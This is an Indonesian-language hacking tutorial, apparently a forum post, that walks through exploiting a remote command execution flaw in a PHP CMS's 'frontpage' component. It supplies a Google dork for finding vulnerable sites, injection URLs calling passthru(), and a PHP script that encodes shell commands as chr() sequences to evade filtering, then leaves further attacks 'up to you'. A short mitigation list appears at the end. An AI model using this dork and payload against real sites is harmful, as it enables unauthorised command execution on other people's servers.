Gw masih newbie,lamerz, tapi mau coba2 berbagi ilmu :">
okeh deh, langsung ajah :-" .....(ya ga men? =)) =)) )
New Page 1
biasai lah, googling dulu....
inurl:"option=frontpage&itemid="
atau pake keyword yang lain, terserah gimana kreatipnya
tuh...kan...banyak....hehehehe....
contoh:
http://www.localhost/index.php?options=frontpage&itemid=passthru(id)
eh....ternyata di'execute' tuh :D
coba lagi ah,
http://www.localhost/index.php?options=frontpage&itemid=passthru(ls -al)
loh....ko ga di execute? hiks.....gimana nih.... :(( :((
hehehe....bisa men :D
lu bisa pake php script, atau bahasa pemrograman apa aja yang lu bisa.
Intinya, command yang mau di eksekusi itu masing2 karakternya
di ubah jadi code ascii, dan diantara kode itu ditambahin tanda "." (titik).
(Lah iya....kan 'target'nya kan pake php, jadi 'penggabung'nya pake "." :P )
misalnya huruf:
a = chr(97)
b = chr(98)
c = chr(99)
...
dan seterusnya.
contohnya:
ls = chr(108).chr(115)
uname = chr(117).chr(110).chr(97).chr(109).chr(101)
Binun ga lu? .... tau deh, gw aja binun neranginnya =)) =))
Oke, ini contohnya gw bikin pake php dan gw save sebagai ascii.php:
//-----Begining of File
<?php
$perintah = stripslashes($perintah);
$arrayku = preg_split('//', $perintah,-1,PREG_SPLIT_NO_EMPTY);
// kalau di php 5, ada fungsi str_split();
function addchr($n) {
$n = 'chr(' . ord($n) . ')';
return $n;
}
$hasil = implode(".",array_map("addchr",$arrayku));
echo $perintah . "<br>\n" . $hasil;
?>
//-----End of File
nah, kalo gw jalanin di local pc gw:
http://localhost/ascii.php?perintah=ls -al
Dan hasilnya:
ls -al
chr(108).chr(115).chr(32).chr(45).chr(97).chr(108)
nah, itu yang nanti kita masukin nantinya dalam fungsi passthru(), jadinya
begini:
http://www.localhost/index.php?options=frontpage&itemid=passthru(chr(108).chr(115).chr(32).chr(45).chr(97).chr(108))
oopsss......ternyata di'execute'
Selanjutnya.....ya terserah :-" :-" :-"
Pencegahannya?
* Kalau lu punya akses konfigurasi php, lu bisa disable fungsi2 yang 'membahayakan',
misalnya fungsi passthru(),system(),exec() dan lain nya.
* Kalau ga punya akses konfigureasi, lu upgrade dong ke versi yang baru :-"
atau cari patch nya =)) =)) =))
# Thanks to Allah SWT
# Thanks to teman2 semua
# gw ga punya "geng" seperti #echo, #hackerlink atau yang lainnya
# jadi gw "shout" nya untuk semua aja >:D<
# Kritik dan saran, komentar, atau apapun....silahkan kontak 360live.xbox (at)
gmail.com
|